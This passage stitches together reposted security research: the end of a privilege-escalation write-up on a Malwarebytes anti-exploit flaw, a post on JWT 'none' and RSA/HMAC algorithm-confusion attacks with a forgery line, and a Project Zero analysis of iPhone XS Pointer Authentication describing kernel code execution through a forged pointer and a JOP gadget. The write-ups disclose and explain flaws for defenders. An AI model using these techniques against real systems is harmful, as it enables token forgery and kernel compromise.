obfuscation is the same because of the commutativity of XORs. The fact that the thread ID is involved makes the hash and the data parts less predictable, but actually we can make the entire payload static by using a thread whose LSB of the thread ID is constant, like always 0. Then the correct hash can be obtained from memory using a debugger. Reversing the (SHA-1 like) hashing algorithm wasn’t necessary. Exploitation The idea of exploitation is to redirect the location of the crash file using a symbolic link to another location like \GLOBAL??\C:\Windows\system32\msfte.dll, then overwrite it with a fake DLL. The DLL is supposed to be loaded by a process with SYSTEM priviledge. This techninque is based on the fact that the device map can be changed per process like “chroot” thing in *nix OS. The shortcoming of this method is that we cannot predictively trigger the load of msfte.dll. We could quickly find a better place to put a payload DLL and hijack DLL loads by running a Process Monitor as SYSTEM. Below is a successfull run of the PoC. Timeline 2018.10.25: Vunlerability detected. 2018.10.30: PoC shared with Malwarebytes. 2019.02.02: Full disclosure. References [1] https://github.com/GradiusX/HEVD-Python-Solutions/blob/master/Win7 x86/HEVD_InsecureKernelResourceAccess.py [2] http://blog.airesoft.co.uk/2012/01/chroot-ing-in-windows-as-easy-as-a-b-c/ Sursa: https://acru3l.github.io/2019/02/02/exploiting-mb-anti-exploit/
-
Critical vulnerabilities in JSON Web Token libraries Which libraries are vulnerable to attacks and how to prevent them. Tim McLean March 31, 2015 Share this post tl;dr If you are using node-jsonwebtoken, pyjwt, namshi/jose, php-jwt or jsjwt with asymmetric keys (RS256, RS384, RS512, ES256, ES384, ES512) please update to the latest version. See jwt.io for more information on the vulnerable libraries. (Updated 2015-04-20) This is a guest post from Tim McLean, who is a member of the Auth0 Security Researcher Hall of Fame. Tim normally blogs at www.timmclean.net. Recently, while reviewing the security of various JSON Web Token implementations, I found many libraries with critical vulnerabilities allowing attackers to bypass the verification step. The same two flaws were found across many implementations and languages, so I thought it would be helpful to write up exactly where the problems occur. I believe that a change to the standard could help prevent future vulnerabilities. "I found many libraries with critical vulnerabilities allowing attackers to bypass the verification step." TWEET THIS For those who are unfamiliar, JSON Web Token (JWT) is a standard for creating tokens that assert some number of claims. For example, a server could generate a token that has the claim "logged in as admin" and provide that to a client. The client could then use that token to prove that they are logged in as admin. The tokens are signed by the server's key, so the server is able to verify that the token is legitimate. JWTs generally have three parts: a header, a payload, and a signature. The header identifies which algorithm is used to generate the signature, and looks something like this: header = '{"alg":"HS256","typ":"JWT"}' HS256 indicates that this token is signed using HMAC-SHA256. The payload contains the claims that we wish to make: payload = '{"loggedInAs":"admin","iat":1422779638}' As suggested in the JWT spec, we include a timestamp called iat, short for "issued at". The signature is calculated by base64url encoding the header and payload and concatenating them with a period as a separator: key = 'secretkey' unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload) signature = HMAC-SHA256(key, unsignedToken) To put it all together, we base64url encode the signature, and join together the three parts using periods: token = encodeBase64(header) + '.' + encodeBase64(payload) + '.' + encodeBase64(signature) # token is now: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dnZWRJbkFzIjoiYWRtaW4iLCJpYXQiOjE0MjI3Nzk2Mzh9. gzSraSYS8EXBxLN_oWnFSRgCzcmJmMjLiuyu5CSpyHI Great. So, what's wrong with that? Well, let's try to verify a token. First, we need to determine what algorithm was used to generate the signature. No problem, there's an alg field in the header that tells us just that. But wait, we haven't validated this token yet, which means that we haven't validated the header. This puts us in an awkward position: in order to validate the token, we have to allow attackers to select which method we use to verify the signature. This has disastrous implications for some implementations. Meet the "none" algorithm The none algorithm is a curious addition to JWT. It is intended to be used for situations where the integrity of the token has already been verified. Interestingly enough, it is one of only two algorithms that are mandatory to implement (the other being HS256). Unfortunately, some libraries treated tokens signed with the none algorithm as a valid token with a verified signature. The result? Anyone can create their own "signed" tokens with whatever payload they want, allowing arbitrary account access on some systems. Putting together such a token is easy. Modify the above example header to contain "alg": "none" instead of HS256. Make any desired changes to the payload. Use an empty signature (i.e. signature = ""). Most (hopefully all?) implementations now have a basic check to prevent this attack: if a secret key was provided, then token verification will fail for tokens using the none algorithm. This is a good idea, but it doesn't solve the underlying problem: attackers control the choice of algorithm. Let's keep digging. RSA or HMAC? The JWT spec also defines a number of asymmetric signing algorithms (based on RSA and ECDSA). With these algorithms, tokens are created and signed using a private key, but verified using a corresponding public key. This is pretty neat: if you publish the public key but keep the private key to yourself, only you can sign tokens, but anyone can check if a given token is correctly signed. Most of the JWT libraries that I've looked at have an API like this: # sometimes called "decode" verify(string token, string verificationKey) # returns payload if valid token, else throws an error In systems using HMAC signatures, verificationKey will be the server's secret signing key (since HMAC uses the same key for signing and verifying): verify(clientToken, serverHMACSecretKey) In systems using an asymmetric algorithm, verificationKey will be the public key against which the token should be verified: verify(clientToken, serverRSAPublicKey) Unfortunately, an attacker can abuse this. If a server is expecting a token signed with RSA, but actually receives a token signed with HMAC, it will think the public key is actually an HMAC secret key. How is this a disaster? HMAC secret keys are supposed to be kept private, while public keys are, well, public. This means that your typical ski mask-wearing attacker has access to the public key, and can use this to forge a token that the server will accept. Doing so is pretty straightforward. First, grab your favourite JWT library, and choose a payload for your token. Then, get the public key used on the server as a verification key (most likely in the text-based PEM format). Finally, sign your token using the PEM-formatted public key as an HMAC key. Essentially: forgedToken = sign(tokenPayload, 'HS256', serverRSAPublicKey) The trickiest part is making sure that serverRSAPublicKey is identical to the verification key used on the server. The strings must match exactly for the attack to work -- exact same format, and no extra or missing line breaks. End result? Anyone with knowledge of the public key can forge tokens that will pass verification. Recommendations for Library Developers I suggest that JWT libraries add an algorithm parameter to their verification function: verify(string token, string algorithm, string verificationKey) The server should already know what algorithm it uses to sign tokens, and it's not safe to allow attackers to provide this value. Some might argue that some servers need to support more than one algorithm for compatibility reasons. In this case, a separate key can (and should) be used for each supported algorithm. JWT conveniently provides a "key ID" field (kid) for exactly this purpose. Since servers can use the key ID to look up the key and its corresponding algorithm, attackers are no longer able to control the manner in which a key is used for verification. In any case, I don't think JWT libraries should even look at the alg field in the header, except maybe to check that it matches what was the expected algorithm. Anyone using a JWT implementation should make sure that tokens with a different signature type are guaranteed to be rejected. Some libraries have an optional mechanism for whitelisting or blacklisting algorithms; take advantage of it or you might end up at risk. Even better: have a policy of performing security audits on any open source libraries that you use to provide mission-critical funtionality. Improving the JWT/JWS standard I would like to propose deprecating the header's alg field. As we've seen here, its misuse can have a devastating impact on the security of a JWT/JWS implementation. As far as I can tell, key IDs provide an adequate alternative. This warrants a change to the spec: JWT libraries continue to be written with security flaws due to their dependence on alg. JWT (and JOSE) present the opportunity to have a cross-platform suite of secure cryptography implementations. With these fixes, hopefully we're a little bit closer to making that a reality. Sursa: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
-
Friday, February 1, 2019 Examining Pointer Authentication on the iPhone XS Posted by Brandon Azad, Project Zero In this post I examine Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS, with a focus on how Apple has improved over the ARM standard. I then demonstrate a way to use an arbitrary kernel read/write primitive to forge kernel PAC signatures for the A keys, which is sufficient to execute arbitrary code in the kernel using JOP. The technique I discovered was (mostly) fixed in iOS 12.1.3. In fact, this fix first appeared in the 16D5032a beta while my research was still ongoing. ARMv8.3-A Pointer Authentication Among the most exciting security features introduced with ARMv8.3-A is Pointer Authentication, a feature where the upper bits of a pointer are used to store a Pointer Authentication Code (PAC), which is essentially a cryptographic signature on the pointer value and some additional context. Special instructions have been introduced to add an authentication code to a pointer and to verify an authenticated pointer's PAC and restore the original pointer value. This gives the system a way to make cryptographically strong guarantees about the likelihood that certain pointers have been tampered with by attackers, which offers the possibility of greatly improving application security. (Proper terminology dictates that the security feature is called Pointer Authentication while the cryptographic signature that is inserted into the unused bits of a pointer is called the Pointer Authentication Code, or PAC. However, popular usage has already confused these terms, and it is common to see Pointer Authentication referred to as PAC. Usually this usage is unambiguous, so for brevity I will often refer to Pointer Authentication as PAC as well.) There are many great articles describing Pointer Authentication, so I'll only go over the rough details here. Interested readers can refer to Qualcomm's whitepaper, Mark Rutland's slides from the 2017 Linux Security Summit, this LWN article by Jonathan Corbet, and the ARM A64 Instruction Set Architecture for further details. The key insight that makes Pointer Authentication viable is that, although pointers are 64 bits, most systems have a virtual address space that is much smaller, which leaves unused bits in a pointer that can be used to store additional data. In the case of Pointer Authentication, these bits will be used to store a short authentication code over both the original 64-bit pointer value and a 64-bit context value. Systems are allowed to use an implementation-defined algorithm to compute PACs, but the standard recommends the use of a block cipher called QARMA. According to the whitepaper, QARMA is "a new family of lightweight tweakable block ciphers" designed specifically for pointer authentication. QARMA-64, the variant used in the standard, takes as input a secret 128-bit key, a 64-bit plaintext value (the pointer), and a 64-bit tweak (the context), and produces as output a 64-bit ciphertext. The truncated ciphertext becomes the PAC that gets inserted into the unused extension bits of the pointer. The architecture provides for 5 secret 128-bit Pointer Authentication keys. Two of these keys, APIAKey and APIBKey, are used for instruction pointers. Another two, APDAKey and APDBKey, are used for data pointers. And the last key, APGAKey, is a special "general" key that is used for signing larger blocks of data with the PACGA instruction. Providing multiple keys allows for some basic protection against pointer substitution attacks, in which one authenticated pointer is substituted with another. The values of these keys are set by writing to special system registers. The registers containing the Pointer Authentication keys are inaccessible from EL0, meaning that a userspace process cannot read or change them. However, the hardware provides no other key management features: it's up to the code running at each exception level to manage the keys for the next lower exception level. ARMv8.3-A introduces three new categories of instructions for dealing with PACs: PAC* instructions generate and insert the PAC into the extension bits of a pointer. For example, PACIA X8, X9 will compute the PAC for the pointer in register X8 under the A-instruction key, APIAKey, using the value in X9 as context, and then write the resulting PAC'd pointer back in X8. Similarly, PACIZA is like PACIA except the context value is fixed to 0. AUT* instructions verify a pointer's PAC (along with the 64-bit context value). If the PAC is valid, then the PAC is replaced with the original extension bits. Otherwise, if the PAC is invalid (indicating that this pointer was tampered with), then an error code is placed in the pointer's extension bits so that a fault is triggered if the pointer is dereferenced. For example, AUTIA X8, X9 will verify the PAC'd pointer in X8 under the A-instruction key using X9 as context, writing the valid pointer back to X8 if successful and writing an invalid value otherwise. XPAC* instructions remove a pointer's PAC and restore the original value without performing verification. In addition to these general Pointer Authentication instructions, a number of specialized variants were introduced to combine Pointer Authentication with existing operations: BLRA* instructions perform a combined authenticate-and-branch operation: the pointer is validated and then used as the branch target for BLR. For example, BLRAA X8, X9 will authenticate the PAC'd pointer in X8 under the A-instruction key using X9 as context and then branch to the resulting address. LDRA* instructions perform a combined authenticate-and-load operation: the pointer is validated and then data is loaded from that address. For example, LDRAA X8, X9 will validate the PAC'd pointer X9 under the A-data key using a context value of 0 and then load the 64-bit value at the resulting address into X8. RETA* instructions perform a combined authenticate-and-return operation: the link register LR is validated and then RET is performed. For example, RETAB will verify LR using the B-instruction key and then return. A known limitation: signing gadgets Before we start our analysis of PAC, I should mention a known limitation: PAC can be bypassed if an attacker with read/write access can coerce the system into executing a signing gadget. Signing gadgets are instruction sequences that can be used to sign arbitrary pointers. For example, if an attacker can trigger the execution of a function that reads a pointer from memory, adds a PAC, and writes it back, then they can use this function as a signing oracle to forge PACs for arbitrary pointers. Weaknesses against kernel attackers As discussed in the Qualcomm whitepaper, ARMv8.3 Pointer Authentication was designed to provide some protection even against attackers with arbitrary memory read or arbitrary memory write capabilities. But it's important to understand the limitations of the design under the attack model we're considering: a kernel attacker who already has read/write and is looking to execute arbitrary code by forging PACs on kernel pointers. Looking at the specification, I identified three potential weaknesses in the design when protecting against kernel attackers with read/write: reading the PAC keys from memory, signing kernel pointers in userspace, and signing A-key pointers using the B-key (or vice versa). We'll discuss each in turn. Reading PAC keys from kernel memory First let's consider what is perhaps the most obvious type of attack: just reading the PAC keys from kernel memory and then manually computing PACs for arbitrary kernel pointers. Here's an excerpt from the subsection of the whitepaper on attackers who can read arbitrary memory: Pointer Authentication is designed to resist memory disclosure attacks. The PAC is computed using a cryptographically strong algorithm, so reading any number of authenticated pointers from memory would not make it easier to forge pointers. The keys are stored in processor registers, and these registers are not accessible from usermode (EL0). Therefore, a memory disclosure vulnerability would not help extract the keys used for PAC generation. While true, this description applies specifically to attacking a userspace program, not attacking the kernel itself. Recent iOS devices do not appear to be running a hypervisor (EL2) or secure monitor (EL3), meaning the kernel running at EL1 must manage its own PAC keys. And since the system registers that store them during normal operation will be cleared when the core goes to sleep, this means that the PAC keys must at some point be stored in kernel memory. Thus an attacker with kernel memory access could probably read the keys and use them to manually compute authentication codes for arbitrary pointers. Of course, this approach assumes that we know what algorithm is being used under the hood to generate PACs so that we can implement it ourselves in userspace. Knowing Apple, there's a good chance they're use a custom algorithm in place of QARMA. If that's the case, then knowing the PAC keys wouldn't be sufficient to forge PACs: either we'd have to reverse engineer the silicon and determine the algorithm, or we'd have to find a way to reuse the existing machinery to forge pointers on our behalf. Cross-EL PAC forgeries Along the latter line of analysis, one possible way to do that would be to forge PACs for kernel pointers by executing the corresponding PAC* instructions in userspace. While this may sound naive, there are a few reasons this could work. While unlikely, it's possible that Apple has decided to use the same PAC keys for EL0 and EL1, in which case we could forge a kernel PACIA signature (for example) by literally executing a PACIA instruction on the kernel pointer from userspace. You can see that the ARM pseudocode describing the implementation of PAC* instructions makes no distinction between whether this instruction was executed at EL0 or EL1. Here's the pseudocode for AddPACIA(), which describes the implementation of PACIA-like instructions: // AddPACIA() // ========== // Returns a 64-bit value containing X, but replacing the pointer // authentication code field bits with a pointer authentication code, where the // pointer authentication code is derived using a cryptographic algorithm as a // combination of X, Y, and the APIAKey_EL1. bits(64) AddPACIA(bits(64) X, bits(64) Y) boolean TrapEL2; boolean TrapEL3; bits(1) Enable; bits(128) APIAKey_EL1; APIAKey_EL1 = APIAKeyHi_EL1<63:0>:APIAKeyLo_EL1<63:0>; case PSTATE.EL of when EL0 boolean IsEL1Regime = S1TranslationRegime() == EL1; Enable = if IsEL1Regime then SCTLR_EL1.EnIA else SCTLR_EL2.EnIA; TrapEL2 = (EL2Enabled() && HCR_EL2.API == '0' && (HCR_EL2.TGE == '0' || HCR_EL2.E2H == '0')); TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0'; when EL1 Enable = SCTLR_EL1.EnIA; TrapEL2 = EL2Enabled() && HCR_EL2.API == '0'; TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0'; ... if Enable == '0' then return X; elsif TrapEL2 then TrapPACUse(EL2); elsif TrapEL3 then TrapPACUse(EL3); else return AddPAC(X, Y, APIAKey_EL1, FALSE); And here's the pseudocode implementation of AddPAC(): // AddPAC() // ======== // Calculates the pointer authentication code for a 64-bit quantity and then // inserts that into pointer authentication code field of that 64-bit quantity. bits(64) AddPAC(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data) bits(64) PAC; bits(64) result; bits(64) ext_ptr; bits(64) extfield; bit selbit; boolean tbi = CalculateTBI(ptr, data); integer top_bit = if tbi then 55 else 63; // If tagged pointers are in use for a regime with two TTBRs, use bit<55> of // the pointer to select between upper and lower ranges, and preserve this. // This handles the awkward case where there is apparently no correct // choice between the upper and lower address range - ie an addr of // 1xxxxxxx0... with TBI0=0 and TBI1=1 and 0xxxxxxx1 with TBI1=0 and // TBI0=1: if PtrHasUpperAndLowerAddRanges() then ... else selbit = if tbi then ptr<55> else ptr<63>; integer bottom_PAC_bit = CalculateBottomPACBit(selbit); // The pointer authentication code field takes all the available bits in // between extfield = Replicate(selbit, 64); // Compute the pointer authentication code for a ptr with good extension bits if tbi then ext_ptr = ptr<63:56>:extfield<(56-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>; else ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>; PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>); // Check if the ptr has good extension bits and corrupt the pointer // authentication code if not; if !IsZero(ptr<top_bit:bottom_PAC_bit>) && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then PAC<top_bit-1> = NOT(PAC<top_bit-1>); // Preserve the determination between upper and lower address at bit<55> // and insert PAC if tbi then result = ptr<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>; else result = PAC<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>; return result; Operationally, there are no significant differences between executing PACIA at EL0 and EL1, which means that if Apple has used the same PAC keys for both exception levels, we can simply execute PACIA in userspace to sign kernel pointers. Of course, it seems highly unlikely that Apple has left such an obvious hole in their implementation. Even so, the symmetry between EL0 and EL1 means that we could potentially forge kernel PACIA signatures by reading the kernel's PAC keys, replacing the userspace PAC keys for one thread in our process with the kernel PAC keys, and then we could indeed forge kernel pointers by executing PACIA in userspace in that thread. This would be useful if Apple is using an unknown algorithm in place of QARMA, since we could reuse the existing signing machinery without having to reverse engineer it. Cross-key PAC forgeries Another symmetry that we could potentially leverage to produce PAC forgeries is between the different PAC keys: PACIA, PACIB, PACDA, and PACDB all reduce to the same implementation under the hood, just using different keys. Thus, if we can replace one PAC key with another, we can turn signing gadgets for one key into signing gadgets for another key. This would be useful if, for example, the PAC algorithm is unknown and there is something that prevents us from setting the userspace PAC keys equal to the kernel PAC keys so that we can perform cross-EL forgeries. While this forgery strategy is much less powerful, since we'd need to rely on the existence of PAC signing gadgets (which are a known limitation of PAC), this technique would free us from the restriction that the signing gadget use the same key that we're trying to forge, potentially diversifying the set of available gadgets. Finding an entry point for kernel code execution Now that we have some theoretical ideas of how we might try and defeat PAC on A12 devices, let's look at the other end and figure out how we could use a PAC bypass to execute arbitrary code in the kernel. The traditional way to get kernel code execution via read/write is the iokit_user_client_trap() strategy described by Stefan Esser in Tales from iOS 6 Exploitation. This strategy involves patching the vtable of an IOUserClient instance so that calling the userspace function IOConnectTrap6(), which invokes iokit_user_client_trap() in the kernel, will call an arbitrary function with up to 7 arguments. To see why this works, here's the implementation of iokit_user_client_trap() from XNU 4903.221.2: kern_return_t iokit_user_client_trap(struct iokit_user_client_trap_args *args) { kern_return_t result = kIOReturnBadArgument; IOUserClient *userClient; if ((userClient = OSDynamicCast(IOUserClient, iokit_lookup_connect_ref_current_task((mach_port_name_t) (uintptr_t)args->userClientRef)))) { IOExternalTrap *trap; IOService *target = NULL; trap = userClient->getTargetAndTrapForIndex(&target, args->index); if (trap && target) { IOTrap func; func = trap->func; if (func) { result = (target->*func)(args->p1, args->p2, args->p3, args->p4, args->p5, args->p6); } } iokit_remove_connect_reference(userClient); } return result; } If we can patch the IOUserClient instance such that getTargetAndTrapForIndex() returns controlled values for trap and target, then the invocation of target->func below will call an arbitrary kernel function with up to 7 controlled arguments (target plus p1 through p6). To see how this strategy would work on A12 devices, let's examine the changes to this function introduced by PAC. This is easiest to understand by looking at the disassembly: iokit_user_client_trap PACIBSP ... ;; Call iokit_lookup_connect_ref_current_task() on ... ;; args->userClientRef and cast the result to IOUserClient. loc_FFFFFFF00808FF00 STR XZR, [SP,#0x30+var_28] ;; target = NULL LDR X8, [X19] ;; x19 = userClient, x8 = ->vtable AUTDZA X8 ;; validate vtable's PAC ADD X9, X8, #0x5C0 ;; x9 = pointer to vmethod in vtable LDR X8, [X8,#0x5C0] ;; x8 = vmethod getTargetAndTrapForIndex MOVK X9, #0x2BCB,LSL#48 ;; x9 = 2BCB`vmethod_pointer LDR W2, [X20,#8] ;; w2 = args->index ADD X1, SP, #0x30+var_28 ;; x1 = &target MOV X0, X19 ;; x0 = userClient BLRAA X8, X9 ;; PAC call ->getTargetAndTrapForIndex LDR X9, [SP,#0x30+var_28] ;; x9 = target CMP X0, #0 CCMP X9, #0, #4, NE B.EQ loc_FFFFFFF00808FF84 ;; if !trap || !target LDP X8, X11, [X0,#8] ;; x8 = trap->func, x11 = func virtual? AND X10, X11, #1 ORR X12, X10, X8 CBZ X12, loc_FFFFFFF00808FF84 ;; if !func ADD X0, X9, X11,ASR#1 ;; x0 = target CBNZ X10, loc_FFFFFFF00808FF58 MOV X9, #0 ;; Use context 0 for non-virtual func B loc_FFFFFFF00808FF70 loc_FFFFFFF00808FF58 ... ;; Handle the case where trap->func is a virtual method. loc_FFFFFFF00808FF70 LDP X1, X2, [X20,#0x10] ;; x1 = args->p1, x2 = args->p2 LDP X3, X4, [X20,#0x20] ;; x3 = args->p3, x4 = args->p4 LDP X5, X6, [X20,#0x30] ;; x5 = args->p5, x6 = args->p6 BLRAA X8, X9 ;; PAC call func(target, p1, ..., p6) MOV X21, X0 loc_FFFFFFF00808FF84 ... ;; Call iokit_remove_connect_reference(). loc_FFFFFFF00808FF8C ... ;; Epilogue. RETAB As you can see, there are several places where PACs are authenticated. The first, which was omitted from the assembly for brevity, happens when performing the dynamic cast to IOUserClient. Then userClient's vtable is validated and a PAC-protected call to getTargetAndTrapForIndex() is made. After that, the trap->func field is read without validation, and finally the value func is validated with context 0 and called. This is actually about the best case we could reasonably hope for as attackers. If we can find a legitimate user client that provides an implementation of getTargetAndTrapForIndex() that returns a pointer to an IOExternalTrap residing in writable memory, then all we have to do is replace trap->func with a PACIZA'd function pointer (that is, a pointer signed under APIAKey with context 0). That means only a partial PAC bypass, such as the ability to forge just PACIZA pointers, would be sufficient. A quick search through the kernelcache revealed a unique IOUserClient class, IOAudio2DeviceUserClient, that fit these criteria. Here's a decompilation of its getTargetAndTrapForIndex() method: IOExternalTrap *IOAudio2DeviceUserClient::getTargetAndTrapForIndex( IOAudio2DeviceUserClient *this, IOService **target, unsigned int index) { ... *target = (IOService *)this; return &this->IOAudio2DeviceUserClient.traps[index]; } The traps field is initialized in the method IOAudio2DeviceUserClient::initializeExternalTrapTable() to a heap-allocated IOExternalTrap object: this->IOAudio2DeviceUserClient.trap_count = 1; this->IOAudio2DeviceUserClient.traps = IOMalloc(sizeof(IOExternalTrap)); Thus, all we need to do to call an arbitrary kernel function is create our own IOAudio2DeviceUserClient connection, forge a PACIZA pointer to the function we want to call, overwrite the userClient->traps[0].func field with the PACIZA'd pointer, and invoke IOConnectTrap6() from userspace. This will give us control of all arguments except X0, which is explicitly set to this by IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex(). To gain control of X0 alongside X1 through X6, we'll need to replace IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex() in the vtable. This means that, in addition to forging the PACIZA pointer to the function we want to call, we'll also need to create a fake vtable consisting of PACIA'd pointers to the virtual methods, and we'll need to replace the existing vtable pointer with a PACDZA'd pointer to the fake vtable. This requires a significantly broader PAC forgery capability. However, even if we only manage to produce PACIZA forgeries, there's still a way to gain control of X0: JOP gadgets. A quick search through the kernelcache revealed the following gadget that sets X0: MOV X0, X4 BR X5 This gives us a way to call arbitrary kernel functions with 4 fully controlled arguments using just a single forged pointer: use iokit_user_client_trap() to call a PACIZA'd pointer to this gadget with X1 through X3 set how we want them for the function call, X4 set to our desired value for X0, and X5 set to the target function we want to call. Analyzing PAC on the A12 Now that we know how we can use PAC forgery to call arbitrary kernel functions, let's begin analyzing Apple's implementation of PAC on the A12 SoC for weaknesses. Ideally we'll find a way to perform both PACIA and PACDA forgeries, but as previously discussed, even the ability to forge a single PACIZA pointer will be sufficient to call arbitrary kernel functions with up to 4 arguments. To actually perform my analysis, I used the voucher_swap exploit to get kernel read/write on an iPhone XR running iOS 12.1.1 build 16C50. Finding where PAC keys are set My first step was to identify where in the kernel's code the PAC keys were being set. Unfortunately, IDA does not display names for the special registers used to store the PAC keys, so I had to do a bit of digging. Searching for "APIAKey" in the LLVM repository mirror on GitHub revealed that the registers used to store the APIAKey are called APIAKeyLo_EL1 and APIAKeyHi_EL1, and the registers for other keys are similarly named. Furthermore, the file AArch64SystemOperands.td declares the codes for these registers. This allows us to easily search for these registers in IDA. For example, to find where APIAKeyLo_EL1 is set, I searched for the string "#0, c2, c1, #0". This brought me to what I identified as part of common_start, from osfmk/arm64/start.s: _WriteStatusReg(TCR_EL1, sysreg_restore); // 3, 0, 2, 0, 2 PPLTEXT__set__TTBR0_EL1(x25 & 0xFFFFFFFFFFFF); _WriteStatusReg(TTBR1_EL1, (x25 + 0x4000) & 0xFFFFFFFFFFFF); // 3, 0, 2, 0, 1 _WriteStatusReg(MAIR_EL1, 0x44F00BB44FF); // 3, 0, 10, 2, 0 if ( x21 ) _WriteStatusReg(TTBR1_EL1, cpu_ttep); // 3, 0, 2, 0, 1 _WriteStatusReg(VBAR_EL1, ExceptionVectorsBase + x22 - x23); // 3, 0, 12, 0, 0 do x0 = _ReadStatusReg(S3_4_C15_C0_4); // ???? while ( !(x0 & 2) ); _WriteStatusReg(S3_4_C15_C0_4, x0 | 5); // ???? __isb(0xF); _WriteStatusReg(APIBKeyLo_EL1, 0xFEEDFACEFEEDFACF); // 3, 0, 2, 1, 2 _WriteStatusReg(APIBKeyHi_EL1, 0xFEEDFACEFEEDFACF); // 3, 0, 2, 1, 3 _WriteStatusReg(APDBKeyLo_EL1, 0xFEEDFACEFEEDFAD0); // 3, 0, 2, 2, 2 _WriteStatusReg(APDBKeyHi_EL1, 0xFEEDFACEFEEDFAD0); // 3, 0, 2, 2, 3 _WriteStatusReg(S3_4_C15_C1_0, 0xFEEDFACEFEEDFAD1); // ???? _WriteStatusReg(S3_4_C15_C1_1, 0xFEEDFACEFEEDFAD1); // ???? _WriteStatusReg(APIAKeyLo_EL1, 0xFEEDFACEFEEDFAD2); // 3, 0, 2, 1, 0 _WriteStatusReg(APIAKeyHi_EL1, 0xFEEDFACEFEEDFAD2); // 3, 0, 2, 1, 1 _WriteStatusReg(APDAKeyLo_EL1, 0xFEEDFACEFEEDFAD3); // 3, 0, 2, 2, 0 _WriteStatusReg(APDAKeyHi_EL1, 0xFEEDFACEFEEDFAD3); // 3, 0, 2, 2, 1 _WriteStatusReg(APGAKeyLo_EL1, 0xFEEDFACEFEEDFAD4); // 3, 0, 2, 3, 0 _WriteStatusReg(APGAKeyHi_EL1, 0xFEEDFACEFEEDFAD4); // 3, 0, 2, 3, 1 _WriteStatusReg(SCTLR_EL1, 0xFC54793D); // 3, 0, 1, 0, 0 __isb(0xF); _WriteStatusReg(CPACR_EL1, 0x300000); // 3, 0, 1, 0, 2 _WriteStatusReg(TPIDR_EL1, 0); // 3, 0, 13, 0, 4 This is very interesting, since it looks like common_start sets the PAC keys to constant values every time a core starts up! Thinking that perhaps this was an artifact of the decompilation, I checked the disassembly: common_start+A8 LDR X0, =0xFEEDFACEFEEDFACF ;; x0 = pac_key MSR #0, c2, c1, #2, X0 ;; APIBKeyLo_EL1 MSR #0, c2, c1, #3, X0 ;; APIBKeyHi_EL1 ADD X0, X0, #1 MSR #0, c2, c2, #2, X0 ;; APDBKeyLo_EL1 MSR #0, c2, c2, #3, X0 ;; APDBKeyHi_EL1 ADD X0, X0, #1 MSR #4, c15, c1, #0, X0 ;; ???? MSR #4, c15, c1, #1, X0 ;; ???? ADD X0, X0, #1 MSR #0, c2, c1, #0, X0 ;; APIAKeyLo_EL1 MSR #0, c2, c1, #1, X0 ;; APIAKeyHi_EL1 ADD X0, X0, #1 MSR #0, c2, c2, #0, X0 ;; APDAKeyLo_EL1 MSR #0, c2, c2, #1, X0 ;; APDAKeyHi_EL1 ... pac_key DCQ 0xFEEDFACEFEEDFACF ; DATA XREF: common_start+A8↑r No, common_start really was initializing all the PAC keys to constant values. This was quite surprising: clearly Apple knows that using constant PAC keys breaks all of PAC's security guarantees. So I figured there must be some other place the PAC keys were being initialized to their true runtime values. But after much searching, this appeared to be the only location in the kernelcache that was setting the A keys and the general key. Still, it did appear that the B keys were being set in a few more places: machine_load_context+A8 LDR X1, [X0,#0x458] ... MSR #0, c2, c1, #2, X1 ;; APIBKeyLo_EL1 MSR #0, c2, c1, #3, X1 ;; APIBKeyHi_EL1 ADD X1, X1, #1 MSR #0, c2, c2, #2, X1 ;; APDBKeyLo_EL1 MSR #0, c2, c2, #3, X1 ;; APDBKeyHi_EL1 Call_continuation+10 LDR X5, [X4,#0x458] ... MSR #0, c2, c1, #2, X5 ;; APIBKeyLo_EL1 MSR #0, c2, c1, #3, X5 ;; APIBKeyHi_EL1 ADD X5, X5, #1 MSR #0, c2, c2, #2, X5 ;; APDBKeyLo_EL1 MSR #0, c2, c2, #3, X5 ;; APDBKeyHi_EL1 Switch_context+11C LDR X3, [X2,#0x458] ... MSR #0, c2, c1, #2, X3 ;; APIBKeyLo_EL1 MSR #0, c2, c1, #3, X3 ;; APIBKeyHi_EL1 ADD X3, X3, #1 MSR #0, c2, c2, #2, X3 ;; APDBKeyLo_EL1 MSR #0, c2, c2, #3, X3 ;; APDBKeyLo_EL1 Idle_load_context+88 LDR X1, [X0,#0x458] ... MSR #0, c2, c1, #2, X1 ;; APIBKeyLo_EL1 MSR #0, c2, c1, #3, X1 ;; APIBKeyHi_EL1 ADD X1, X1, #1 MSR #0, c2, c2, #2, X1 ;; APDBKeyLo_EL1 MSR #0, c2, c2, #3, X1 ;; APDBKeyHi_EL1 These are the only other places in the kernel that set PAC keys, and they all follow the same pattern: a 64-bit load from offset 0x458 into some data structure (later identified as struct thread), then setting the APIBKey to that value concatenated with itself, and setting the APDBKey to that value plus one concatenated with itself. Furthermore, all of these locations deal specifically with context switching between threads; conspicuously absent from this list is any indication that the PAC keys are changed when transitioning between exception levels, either on kernel entry (e.g. via a syscall) or on kernel exit (via ERET*). This would be a strong indication that the PAC keys are indeed shared between userspace and the kernel. (I subsequently learned that @ProteasWang discovered the same thing I did: a GitHub gist called pac-set-key.md lists only the previously mentioned locations.) If my understanding was correct, this seemed to suggest three disturbing and, frankly, highly unlikely things. First, contrary to all rules of cryptography, it appeared that the kernel was using constant values for the A keys and the general key. Second, the keys seemed to be effectively 64-bits, since the first and second halves of the 128-bit key are the same. And third, the PAC keys appeared to be shared between userspace and the kernel, meaning userspace could forge kernel PAC signatures. Could Apple's implementation really be that broken? Or was something else going on? Observing runtime behavior In order to find out, I conducted a simple experiment: I read the value of a global PACIZA'd function pointer in the __DATA_CONST.__const section over many different boots, recording the value of the kASLR slide each time. Since the number of possible kernel slide values is relatively 